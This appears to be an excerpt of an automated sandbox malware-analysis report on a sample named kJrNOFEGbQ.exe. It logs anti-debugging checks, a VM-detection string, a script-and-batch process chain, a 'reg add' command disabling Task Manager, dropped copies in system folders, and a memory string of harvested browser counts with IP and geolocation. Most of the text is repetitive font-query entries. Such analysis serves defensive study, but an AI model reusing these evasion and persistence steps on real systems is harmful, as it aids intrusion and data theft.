                                    Source: kJrNOFEGbQ.exe, 00000000.00000003.1664853002.0000000003551000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}P
                                    Source: cmd.exe, 00000021.00000002.2994327918.000000001BF79000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll""
                                    Source: C:\Users\user\Desktop\kJrNOFEGbQ.exeAPI call chain: ExitProcess graph end nodegraph_0-23572
                                    Source: C:\hyperComponentFontDhcp\Mscommon.exeProcess information queried: ProcessInformationJump to behavior
                                    Source: C:\Users\user\Desktop\kJrNOFEGbQ.exeCode function: 0_2_0037F838 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0037F838
                                    Source: C:\Users\user\Desktop\kJrNOFEGbQ.exeCode function: 0_2_00387DEE mov eax, dword ptr fs:[00000030h]0_2_00387DEE
                                    Source: C:\Users\user\Desktop\kJrNOFEGbQ.exeCode function: 0_2_0038C030 GetProcessHeap,0_2_0038C030
                                    Source: C:\hyperComponentFontDhcp\Mscommon.exeProcess token adjusted: DebugJump to behavior
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeProcess token adjusted: Debug
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeProcess token adjusted: Debug
                                    Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exeProcess token adjusted: Debug
                                    Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exeProcess token adjusted: Debug
                                    Source: C:\Program Files (x86)\jDownloader\ruRRsbcJNKBbiFjvLZZICNpuYz.exeProcess token adjusted: Debug
                                    Source: C:\Users\user\Desktop\kJrNOFEGbQ.exeCode function: 0_2_0037F838 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0037F838
                                    Source: C:\Users\user\Desktop\kJrNOFEGbQ.exeCode function: 0_2_0037F9D5 SetUnhandledExceptionFilter,0_2_0037F9D5
                                    Source: C:\Users\user\Desktop\kJrNOFEGbQ.exeCode function: 0_2_0037FBCA SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0037FBCA
                                    Source: C:\Users\user\Desktop\kJrNOFEGbQ.exeCode function: 0_2_00388EBD IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00388EBD
                                    Source: C:\hyperComponentFontDhcp\Mscommon.exeMemory allocated: page read and write | page guardJump to behavior
                                    Source: C:\Users\user\Desktop\kJrNOFEGbQ.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\hyperComponentFontDhcp\uNXdwfIAGKhvsyaDygZbv1al18Fwyj4InpwIf.vbe" Jump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\hyperComponentFontDhcp\XvQn4w4rSFjKx2xId8OEvj2iij2aJuA.bat" "Jump to behavior
                                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /fJump to behavior
                                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\hyperComponentFontDhcp\Mscommon.exe "C:\hyperComponentFontDhcp/Mscommon.exe"Jump to behavior
                                    Source: C:\hyperComponentFontDhcp\Mscommon.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\flsapel1\flsapel1.cmdline"Jump to behavior
                                    Source: C:\hyperComponentFontDhcp\Mscommon.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\qxQMjDgg8i.bat" Jump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESDDA4.tmp" "c:\Windows\System32\CSCA9C827E8660941B2BE855526E0709AE4.TMP"Jump to behavior
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001Jump to behavior
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhostJump to behavior
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files (x86)\jDownloader\ruRRsbcJNKBbiFjvLZZICNpuYz.exe "C:\Program Files (x86)\jdownloader\ruRRsbcJNKBbiFjvLZZICNpuYz.exe" Jump to behavior
                                    Source: cmd.exe, 00000021.00000002.2927984204.0000000003309000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000021.00000002.2927984204.0000000003590000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager
                                    Source: cmd.exe, 00000021.00000002.2927984204.0000000003590000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: [{"Has Messengers (1153)":"N","Has Game Clients (1153)":"N","Has Media Clients (1153)":"N","Has FTP Clients (1153)":"N","Cookies Count (1671)":"25","Passwords Count (1671)":"0","Forms Count (1671)":"0","CC Count (1671)":"0","History Count (1671)":"15"},"5.0.4",5,1,"","user","610930","Windows 10 Enterprise 64 Bit","Y","Y","N","C:\\Users\\All Users\\SoftwareDistribution","PLTWRW (1 GB)","Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz (Intel64 Family 6 Model 143 Stepping 8)","Program Manager","8.46.123.189","US / United States","New York / New York","40.7123 / -74.0068"]<
                                    Source: C:\Users\user\Desktop\kJrNOFEGbQ.exeCode function: 0_2_0037F654 cpuid 0_2_0037F654
                                    Source: C:\Users\user\Desktop\kJrNOFEGbQ.exeCode function: GetLocaleInfoW,GetNumberFormatW,0_2_0037AF0F
                                    Source: C:\hyperComponentFontDhcp\Mscommon.exeQueries volume information: C:\hyperComponentFontDhcp\Mscommon.exe VolumeInformationJump to behavior
                                    Source: C:\hyperComponentFontDhcp\Mscommon.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                                    Source: C:\hyperComponentFontDhcp\Mscommon.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeQueries volume information: C:\ProgramData\SoftwareDistribution\cmd.exe VolumeInformation
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeQueries volume information: C:\ProgramData\SoftwareDistribution\cmd.exe VolumeInformation
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeQueries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformation
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeQueries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformation
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeQueries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformation
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeQueries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformation
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation
